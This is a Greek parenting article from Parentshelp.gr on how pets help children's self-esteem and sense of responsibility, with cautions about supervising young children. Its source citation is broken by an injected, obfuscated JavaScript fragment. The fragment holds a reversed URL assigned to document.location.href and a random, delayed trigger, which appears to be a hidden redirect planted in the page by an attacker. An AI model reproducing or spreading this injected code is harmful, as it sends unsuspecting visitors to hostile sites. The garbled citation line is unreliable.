“Μαμά θέλω να πάρουμε σκυλάκι!”

Φαντάζομαι πως αν όχι όλοι, οι περισσότεροι γονείς θα έχετε έρθει αντιμέτωποι με αυτή την επιθυμία. Και αν όχι σκυλάκι, σίγουρα το παιδί σας θα σας έχει ζητήσει κάποιο κατοικίδιο. Τα παιδιά αγαπούν τα ζώα.

Μια ματιά να ρίξετε μόνο στα δωμάτιά τους, στα βιβλία τους, στις ταινίες, στη μουσική, στα παιχνίδια και στα ρούχα τους και θα σας πείσει. Είτε το κατοικίδιο είναι μεγάλο είτε μικρό, μόνο καλό μπορεί να κάνει στα παιδιά.

Οι έρευνες έχουν δείξει ότι:

  • Τα παιδιά που αναπτύσσουν θετικά συναισθήματα για το κατοικίδιό τους, αναπτύσσουν και καλά συναισθήματα για τον εαυτό τους. Αυτό μπορεί να συμβάλει στην αύξηση της αυτοπεποίθησης και της αυτοεκτίμησης των παιδιών.
  • Η καλή σχέση με τα ζώα βοηθάει τα παιδιά να αναπτύσσουν σχέσεις εμπιστοσύνης και με άλλους.
  • Η φροντίδα του ζώου βοηθάει τα παιδιά να γίνονται υπεύθυνα και να αναπτύσσουν κοινωνικές δεξιότητες.
  • Κάποια κατοικίδια όπως ο σκύλος, μπορούν να καλύψουν συναισθηματικές ανάγκες των παιδιών, ακόμα και να λειτουργήσουν θεραπευτικά. Η επαφή με το ζώο χαλαρώνει σωματικά και ψυχικά το παιδί. Επίσης, το παιδί μέσα από τη σχέση του με το σκύλο μπορεί να βιώσει συναισθήματα πίστης και αγάπη.

Προσέξτε όμως, αν έχετε πάρει απόφαση να αποκτήσετε κάποιο κατοικίδιο:

  • Τα παιδιά ηλικίας 3-4 ετών δεν έχουν την ωριμότητα να ελέγξουν την επιθετικότητα και το θυμό τους. Για αυτό το λόγο θα πρέπει να υπάρχει συνέχεια κάποιος που θα επιβλέπει το παιδί με το κατοικίδιο.
  • Τα παιδιά ηλικίας έως 10 ετών δεν μπορούν να αναλάβουν από μόνα τους τη φροντίδα ενός μεγάλου ζώου όπως είναι ο σκύλος και η γάτα.
  • Οι γονείς θα πρέπει να συμμετέχουν στη φροντίδα του ζώου ακόμα και αν θεωρούν ότι τα παιδιά τους είναι αρκετά ώριμα για να αποκτήσουν κατοικίδιο.
  • Θα πρέπει να υπενθυμίζετε στα παιδιά με ευγενικό τρόπο και όχι με καυγάδες, ότι τα ζώα όπως και οι άνθρωποι θέλουν φαγητό, νερό και άσκηση.
  • Οι γονείς λειτουργούν ως πρότυπα συμπεριφοράς. Τα παιδιά μαθαίνουν την υπευθυνότητα παρατηρώντας τη συμπεριφορά των γονιών τους.

Ελένη Σίγκου για
Parentshelp.gr

Πηγή: American Academy of Child & Atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolescent Psychiatry

Site Footer

Sliding Sidebar

Πρόσφατα